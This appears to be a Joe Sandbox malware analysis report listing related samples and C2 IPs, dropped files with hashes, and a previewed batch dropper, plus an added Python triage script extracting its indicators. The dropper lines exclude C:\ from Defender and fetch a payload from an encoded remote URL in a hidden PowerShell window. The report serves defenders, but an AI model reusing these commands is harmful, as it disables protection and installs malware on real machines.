                                                                                      x86_64-20220704-2102Get hashmaliciousMiraiBrowse
                                                                                      • 93.188.42.210
                                                                                      9faoC0drSoGet hashmaliciousMiraiBrowse
                                                                                      • 93.188.42.249
                                                                                      armGet hashmaliciousMiraiBrowse
                                                                                      • 93.188.42.224
                                                                                      eqqFDsQ1JqGet hashmaliciousMiraiBrowse
                                                                                      • 93.188.42.241
                                                                                      QeykTlqE4SGet hashmaliciousMiraiBrowse
                                                                                      • 93.188.42.232
                                                                                      OBE-EUROPEObenetworkEuropeSEfile.exeGet hashmaliciousAmadey, DCRat, DarkVision Rat, LummaC Stealer, Stealc, VidarBrowse
                                                                                      • 185.157.162.216
file.exe | malicious | DarkVision Rat, Xmrig | 185.157.162.216
secondaryTask.vbs | malicious | Clipboard Hijacker, MicroClip, Remcos | 185.157.162.126
Slf.msi | malicious | Clipboard Hijacker, MicroClip, Remcos | 185.157.162.126
LauncherPred8.3.389 stablesetup.msi | malicious | Clipboard Hijacker, MicroClip, Remcos | 185.157.162.126
la.bot.arm6.elf | malicious | Unknown | 193.183.116.8
LauncherPred8.3.37Stablesetup.msi | malicious | Remcos | 185.157.162.126
Slf.msi | malicious | Remcos | 185.157.162.126
HSG-IVN-2093456FIN.exe | malicious | Remcos | 185.157.163.135
Payload 94.75.225.exe | malicious | Unknown | 45.148.17.56
Associated Sample Name / URL | Detection | Threat Name | Context
Match: 3b5074b1b5d032e5620f69f9f700ff0e
  cllmxIZWcQ.lnk | malicious | Unknown | 154.216.20.243
  qhjKN40R2Q.lnk | malicious | Unknown | 154.216.20.243
  TRANSFERENCIA COMPROBANTES.lnk | malicious | XenoRAT | 154.216.20.243
  TRANSFERENCIA COMPROBANTES.lnk | malicious | Unknown | 154.216.20.243
  TRANSFERENCIA COMPROBANTES.lnk | malicious | Unknown | 154.216.20.243
  TRANSFERENCIA COMPROBANTES.lnk | malicious | XenoRAT | 154.216.20.243
  Transferencia.lnk | malicious | XenoRAT | 154.216.20.243
  Hesap_Hareketleri_09122024_html.exe | malicious | Snake Keylogger, VIP Keylogger | 154.216.20.243
  BUNKER INVOICE MV SUN OCEAN.pdf.vbs | malicious | GuLoader | 154.216.20.243
  Bunker_STS_pdf.vbs | malicious | GuLoader | 154.216.20.243
Match: a0e9f5d64349fb13191bc781f81f42e1
  DXzJ8Bi7WC.exe | malicious | LummaC Stealer | 154.216.20.243
  cd94pB4Z9p.exe | malicious | LummaC Stealer | 154.216.20.243
  AmNdY4tRXD.exe | malicious | LummaC Stealer | 154.216.20.243
  TRANSFERENCIA COMPROBANTES.lnk | malicious | XenoRAT | 154.216.20.243
  TRANSFERENCIA COMPROBANTES.lnk | malicious | Unknown | 154.216.20.243
  TRANSFERENCIA COMPROBANTES.lnk | malicious | Unknown | 154.216.20.243
  6fW0GedR6j.xls | malicious | Unknown | 154.216.20.243
  TRANSFERENCIA COMPROBANTES.lnk | malicious | XenoRAT | 154.216.20.243
  Transferencia.lnk | malicious | XenoRAT | 154.216.20.243
  file.exe | malicious | LummaC Stealer | 154.216.20.243
Associated Sample Name / URL | Detection | Threat Name
Match: C:\Users\user\AppData\Local\Temp\asrjskwdsdoc.sys
  IYXE4Uz61k.exe | malicious | DCRat, PureLog Stealer, Xmrig, zgRAT
  file.exe | malicious | Amadey, DCRat, DarkVision Rat, LummaC Stealer, Stealc, Vidar
  file.exe | malicious | DarkVision Rat, Xmrig
  nlGOh9K5X5.exe | malicious | Xmrig
  LfHJdrALlh.exe | malicious | Xmrig
  iKvzvknzW1.exe | malicious | Xmrig
  2zirzlMVqX.bat | malicious | Xmrig
  DM6vAAgoCw.exe | malicious | Orcus, Xmrig
  f5TWdT5EAc.exe | malicious | Phorpiex, RHADAMANTHYS, Xmrig
  luQ2wBh8q6.exe | malicious | Xmrig
Process:C:\Windows\explorer.exe
File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:dropped
Size (bytes):2887168
Entropy (8bit):7.964338317507939
Encrypted:false
SSDEEP:49152:FTp9YzrfPjjButTQBFMYgTHCUtlYqjNNYo8HKgJY4Hu+RjytSEuEuIPrzoVji90R:9YzrfPxUQ1YCYbjNN8KgJnuLtrzohWvc
MD5:56EC5472231866630749CCF6977C4FBD
SHA1:03C5FE2E0DD49A554B354E7EF26F794F4AA86E9D
SHA-256:E19905020C9685A68C3F4C9F62F57E4B21BC8DCFAD567C89B0B37B42A120182B
SHA-512:46274DFEC96406C4BD101C6207C813E03B965E9F9A6B1B57147BCFB7D24A9180002C3B8001AC85A91DFD0B75F0AABBA119E455D52FA847A751C32F00E3AD4753
Malicious:true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....Vg...............&.`....,................@..............................,....._.,...`... ..............................................@,.h.............+..............p,.............................@.+.(....................C,..............................text...._.......`..................`..`.data........p.......d..............@....rdata...R(......T(..f..............@..@.pdata........+.......+.............@..@.xdata..P'....,..(....+.............@..@.bss.... ....0,..........................idata..h....@,.......+.............@....CRT....p....P,.......,.............@....tls.........`,.......,.............@....reloc.......p,.......,.............@..B................................................................................................................................................................................................................
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):64
Entropy (8bit):0.34726597513537405
Encrypted:false
SSDEEP:3:Nlll:Nll
MD5:446DD1CF97EABA21CF14D03AEBC79F27
SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:false
Preview:@...e...........................................................
Process:C:\Users\user\Desktop\file.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):2006
Entropy (8bit):5.290230213116548
Encrypted:false
SSDEEP:48:Zld+LwqTf/OR9Q1P31Thl5RqAmC/9T5v6MQVQrBt:ZD8Tf/BPFVt5v6sBt
MD5:77CE738D9B82E6EBFCFA3F1081F037FC
SHA1:C4DB7196464F86B05AC3532D99175D2EB09CA7DD
SHA-256:24FEFBB2301EBD0814FBEE1EDB6B28DAFC871DA247DEFA69BFA3FB999AC8D7C1
SHA-512:52AFE5FAA53DEB5D555A7A9FC0F5B8F57503F837BCC8B54E2B7D6819952644B8A6A077C77EF3FBF2AF84AE78B086AB547AF393F9290C1EC69929687D8837D70E
Malicious:true
Preview:
@shift /0
@echo off

net session >nul 2>&1
if %errorlevel% neq 0 (
 powershell -Command "Start-Process -Verb RunAs -FilePath '%~dpnx0' -ArgumentList '/nobreak'"
 exit /b
)

PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'"

setlocal

set "encoded_url=aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4="
set "output=%temp%\downloaded_file.bin"

powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('%encoded_url%'))) -OutFile '%output%'"

set "key=blMgb+WrfPrXMFxK7ymKPM3SVHUAYPt9"
set "iv=5t9nsUPo0cA/tUjH"

set "retries=5"
set "delay=10"

for /L %%i in (1,1,%retries%) do (
 timeout /t %delay% /nobreak >nul
 if exist "%output%" (

 powershell -WindowStyle Hidden -Command ^
 "$key = [System.Text.Encoding]::UTF8.GetBytes('%key%');" ^
 "$iv = [System.Text.Encoding]::UTF8.GetBytes('%iv%
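The batch file dropped by file.exe above is a small staged dropper: it tests for administrator rights with `net session`, relaunches itself behind a UAC consent prompt (`Start-Process -Verb RunAs`) when that fails, excludes the whole `C:\` drive from Windows Defender with `Add-MpPreference`, downloads a payload from a base64-encoded URL in a hidden PowerShell window, and then polls for the file before decrypting it with an AES key and IV that sit in clear text in the script. The Python below is an added triage example, not code from Joe Sandbox or from the sample; it takes the preview text as reproduced in this report (constructed inline) and extracts those indicators. It assumes that each `..` in the report's preview stands for one CRLF line terminator (the file type line says the file uses CRLF), and that the 32-byte key and 16-byte IV mean AES-256 with a block-sized IV, since the truncated preview does not show the cipher call itself.

```python
import base64
import re

# Constructed input: the dropped batch file's preview exactly as this report
# shows it. Joe Sandbox renders non-printable bytes as '.', and the file type
# is "ASCII text, with CRLF line terminators", so each ".." is taken to be a
# CRLF pair. The text stops where the report's preview is truncated.
PREVIEW = (
    "@shift /0..@echo off....net session >nul 2>&1..if %errorlevel% neq 0 (.. powershell "
    "-Command \"Start-Process -Verb RunAs -FilePath '%~dpnx0' -ArgumentList '/nobreak'\".. exit /b..)"
    "......PowerShell -Command \"Add-MpPreference -ExclusionPath 'C:\\'\"....setlocal......"
    "set \"encoded_url=aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4=\" .."
    "set \"output=%temp%\\downloaded_file.bin\" ....powershell -WindowStyle Hidden -Command "
    "\"Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::"
    "FromBase64String('%encoded_url%'))) -OutFile '%output%'\"......"
    "set \"key=blMgb+WrfPrXMFxK7ymKPM3SVHUAYPt9\" ..set \"iv=5t9nsUPo0cA/tUjH\" ......"
    "set \"retries=5\"..set \"delay=10\"....for /L %%i in (1,1,%retries%) do (.. timeout /t %delay% "
    "/nobreak >nul.. if exist \"%output%\" (.. .. powershell -WindowStyle Hidden -Command ^.. "
    "\"$key = [System.Text.Encoding]::UTF8.GetBytes('%key%');\" ^.. "
    "\"$iv = [System.Text.Encoding]::UTF8.GetBytes('%iv%"
)


def preview_to_lines(preview):
    """Turn the report preview back into script lines (assumes '..' == CRLF)."""
    return [line.rstrip() for line in preview.replace("..", "\r\n").split("\r\n")]


def extract_iocs(preview):
    """Pull the indicators a triage analyst wants out of the dropper script."""
    script = "\n".join(preview_to_lines(preview))
    iocs = {}

    # Batch 'set "name=value"' assignments carry the URL, the output path,
    # the AES key/IV and the retry parameters.
    variables = dict(re.findall(r'set\s+"([^"=]+)=([^"]*)"', script))
    iocs["variables"] = variables

    # The download URL is base64-encoded to keep it out of plain string scans.
    if "encoded_url" in variables:
        iocs["download_url"] = base64.b64decode(variables["encoded_url"]).decode("utf-8")
    if "output" in variables:
        iocs["staging_path"] = variables["output"]

    # Key and IV reach PowerShell via UTF8.GetBytes, so their byte lengths are
    # the cipher parameters. Assumption: a 32-byte key and 16-byte IV mean
    # AES-256 with a block-sized IV; the truncated preview hides the mode.
    if "key" in variables and "iv" in variables:
        iocs["key_bytes"] = len(variables["key"].encode("utf-8"))
        iocs["iv_bytes"] = len(variables["iv"].encode("utf-8"))

    # Defense evasion: a Defender path exclusion (here the whole drive).
    m = re.search(r"Add-MpPreference\s+-ExclusionPath\s+'([^']+)'", script)
    iocs["defender_exclusion"] = m.group(1) if m else None

    # Privilege: 'net session' fails without admin rights, so the script
    # relaunches itself behind a UAC consent prompt (RunAs). That is an
    # elevation request the user must approve, not a UAC bypass.
    iocs["admin_check"] = "net session" in script
    iocs["self_elevates"] = bool(re.search(r"Start-Process\s+-Verb\s+RunAs", script))

    # Hidden-window PowerShell download of the staged payload.
    iocs["hidden_download"] = bool(
        re.search(r'-WindowStyle\s+Hidden\s+-Command\s+"Invoke-WebRequest', script)
    )

    # Retry loop: the script waits for the download to land before decrypting.
    iocs["retries"] = int(variables["retries"]) if "retries" in variables else None
    iocs["delay_seconds"] = int(variables["delay"]) if "delay" in variables else None
    return iocs


if __name__ == "__main__":
    for name, value in extract_iocs(PREVIEW).items():
        print(f"{name}: {value}")
```

Running it prints the decoded download URL, the staging path under `%temp%`, the excluded path and the key/IV sizes. The decoded URL and the staging file name are what you would block or hunt for; the `C:\` Defender exclusion is the host artefact to check wherever this batch file is found (`Get-MpPreference` lists the current `ExclusionPath` entries), and because the key and IV are hard-coded, the downloaded `.bin` can be decrypted offline for further analysis once the cipher mode is confirmed from the full script.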
Process:C:\Windows\explorer.exe
File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:dropped
Size (bytes):49152
Entropy (8bit):0.8180424350137764
Encrypted:false
SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:349E6EB110E34A08924D92F6B334801D
SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:false
Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe
                                                                                                          File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):14544
                                                                                                          Entropy (8bit):6.2660301556221185
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                                                                          MD5:0C0195C48B6B8582FA6F6373032118DA
                                                                                                          SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                                                                          SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                                                                          SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 5%
                                                                                                          Joe Sandbox View:
                                                                                                          • Filename: IYXE4Uz61k.exe, Detection: malicious, Browse
                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                          • Filename: nlGOh9K5X5.exe, Detection: malicious, Browse
                                                                                                          • Filename: LfHJdrALlh.exe, Detection: malicious, Browse
                                                                                                          • Filename: iKvzvknzW1.exe, Detection: malicious, Browse
                                                                                                          • Filename: 2zirzlMVqX.bat, Detection: malicious, Browse
                                                                                                          • Filename: DM6vAAgoCw.exe, Detection: malicious, Browse
                                                                                                          • Filename: f5TWdT5EAc.exe, Detection: malicious, Browse
                                                                                                          • Filename: luQ2wBh8q6.exe, Detection: malicious, Browse
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):515600
                                                                                                          Entropy (8bit):7.99963177911539
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:12288:QdzOJGhg2nfH8n9/2FZjsOdj81w/U2CPYjqRXNOB:Q9OUO2fYCZY2GdYj4g
                                                                                                          MD5:8D7493DB663BD32F51A5CEA961029033
                                                                                                          SHA1:1DEB3CDCD775919484EC770C7AE0422BDD9C046E
                                                                                                          SHA-256:67B5F51094A8B094886BF57EFD576EDF76049D301525743A74B920F1E4E3F204
                                                                                                          SHA-512:2E56A1FBBFA4AC54B72415ABCF65FE912E89029E2058DBCD6C0B95511A7CBDFC155B859D262D5CD959B5C7027431F5E4CC441EB0ACA60E960959D3EFECC9E0CB
                                                                                                          Malicious:true
                                                                                                          Preview:.....QS.o..(.*..,&..5.[........1Y........!v6gk..P......_......Pc~..V._Q.(N..j.....i..r.x.{.fX.hy.\q2....&.i..:).e..+..{.g;...?.K..|6.. .5.........I.RG.[..6..v...:.E..)?......M..`.w....z.[f.C. ..?..o.,....x..k..O.1..6...A......gm..@...I..&...'..X.#X.p..../......F.uZ...dA3.W...Z*....o.B..S.9....Y.9...0@}.i..]<?..........;5*..|rL.......H..6....g.s&G./_..|(\-ys...a.(.F.Ou1....B9nW./a..I....5....~d..,..."_....~..:?M..7.g.r....@..._V...w4[\ZZ.k..k.@...3.K....6.........g..<.I..B...|3........M....k.{.............:.U<d1>...s3....w.O.X.\.O.n/.f&..D...:sm..y...66|8W.r.!.d............A.y0._.*..>.-..(.:/M.R......1.u.5...O.Dq.$...%.&.4/.......:....../,...e.....2a.......FDzN..9.[.^.........m}.e....f....~.....h.`H.'....o.m.|.>..V..1.....X.=......(u..z....I3Q....p......(.K...{...(..0ga0.;.......m..s..s......vQx .a....P`....b.k...j~Vm.C.0.b...........R....>H...VNL]`..P.V..K..-I..F...xt.....z.89}i( ..l..z.=.....Z(s....L{1..1zQ.O.....*Bb..s.$...
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):515584
                                                                                                          Entropy (8bit):6.2318905021613515
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:BRHP4vL3s5+CM6OW0nUBiwCCWfS34mbWMkRONOgbBpiEVBHl8ba2z7rkBiL:BRHP63srM6AbCWfS34mSMkrCpPFBE
                                                                                                          MD5:D60C9E070239F8C240AAA6D8832E11EF
                                                                                                          SHA1:AAAC23A338A91505C56C3057D22A14BF190A2795
                                                                                                          SHA-256:493F1BD7227C4EE9430F8AD226E929908996B97A28F578A850E9B26C393AD2D2
                                                                                                          SHA-512:D70CF79DEC352BD965F8506AD989375642A8931300D5497724C82882AE4D57CCC314D4E6B24C398075AF3DEB4433207522106647E70E74C90E56791E20BCA42C
                                                                                                          Malicious:true
                                                                                                          Yara Hits:
                                                                                                          • Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe, Author: Joe Security
                                                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe, Author: ditekSHen
                                                                                                          Antivirus:
                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                          • Antivirus: ReversingLabs, Detection: 83%
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........W...9...9...9.......9..U....9......9......9...8.K.9..U....9..U....9..U....9..U....9..U....9.Rich..9.........................PE..L.....6g............................lb....... ....@..........................P............@....................................d................................/.....................................@............ ...............................text............................... ..`.rdata....... ......................@..@.data....4..........................@....rsrc...............................@..@.reloc...=.......>..................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                          Process:C:\Windows\System32\cmd.exe
                                                                                                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):73
                                                                                                          Entropy (8bit):4.746560909067808
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:mKDDFRKn9mbZkRE5ORWRAI0Eyn:hGEi4ORHnEyn
                                                                                                          MD5:1E0342A7A3BD059510E2A01423F8BAD2
                                                                                                          SHA1:3EB5C2B68A7C14A236826851F784567F94AF0003
                                                                                                          SHA-256:ADD6590578FCD418A8C47F5DE9E1D7688B76D9023D4F58B50076DE743F7319B4
                                                                                                          SHA-512:6DA334D45886354CEB1F8C4B622FC3B26021995DF4DA61DAD44F3E4E6F41C3D92FF5450877F8E8F09D83E1FA62A234D7F4AFC28B050077FB9002C4D81DAF5F65
                                                                                                          Malicious:true
                                                                                                          Preview:@echo off..start "" "C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe"..
                                                                                                          Process:C:\Windows\System32\timeout.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators, with overstriking
                                                                                                          Category:dropped
                                                                                                          Size (bytes):92
                                                                                                          Entropy (8bit):4.300553674183507
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:hYFEHgARcWmFsFJQZtctFst3g4t32vov:hYFE1mFSQZi3MXt3X
                                                                                                          MD5:F74899957624A2837F2F86E8E62E92D4
                                                                                                          SHA1:1FCDAC5DEC5B0B1E00CF0247DA2A5F18566F1431
                                                                                                          SHA-256:507992A303C447D1D40D36E2E5163A237077B94F23A7089AC90A2F08682AE9BC
                                                                                                          SHA-512:E3FD14728633614B6552A75C15079AC8B04C0E8B3F49535B522C73312B1C812E30A934099AB18B507A0B4878068987D5545E90FA3747F7E7B10360EE324DB435
                                                                                                          Malicious:false
                                                                                                          Preview:..Waiting for 10 seconds, press CTRL+C to quit ..... 9.. 8.. 7.. 6.. 5.. 4.. 3.. 2.. 1.. 0..
                                                                                                          File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                          Entropy (8bit):6.478803320046224
                                                                                                          TrID:
                                                                                                          • Win64 Executable GUI (202006/5) 92.64%
                                                                                                          • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                          • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                          • DOS Executable Generic (2002/1) 0.92%
                                                                                                          • VXD Driver (31/22) 0.01%
                                                                                                          File name:file.exe
                                                                                                          File size:124'416 bytes
                                                                                                          MD5:a3d68745e8919e2a48d8fa0738da124e
                                                                                                          SHA1:85ea6ab1d2d3f6af2011b130756d57f31539e171
                                                                                                          SHA256:65bc085f99db63b0581b2153a0aa2d7151133aafeeb2810f56a5d17ef9760d46
                                                                                                          SHA512:99575b08e17dd409e2cede4996bfc812ebe430a811f96b5c08e3093be8149e2aa148c4d7b71f1c24b5d2be592567494ea0118e355839fc83ab3603a34098a5ac
                                                                                                          SSDEEP:3072:a2sMWkzbJh1qZ9QW69hd1MMdxPe9N9uA0hu9TBfcXG2:7bJhs7QW69hd1MMdxPe9N9uA0hu9TBD2
                                                                                                          TLSH:DFC33966B2E01198DBB581F6D9921706EB7074361B15A3DB6BB853B31B2B4C68F3C3D0
                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....msZ........../....2.`.....................@.............................0.............................................
                                                                                                          Icon Hash:90cececece8e8eb0
                                                                                                          Entrypoint:0x140001000
                                                                                                          Entrypoint Section:.code
                                                                                                          Digitally signed:false
                                                                                                          Imagebase:0x140000000
                                                                                                          Subsystem:windows gui
                                                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE
                                                                                                          DLL Characteristics:
                                                                                                          Time Stamp:0x5A736DDC [Thu Feb 1 19:43:24 2018 UTC]
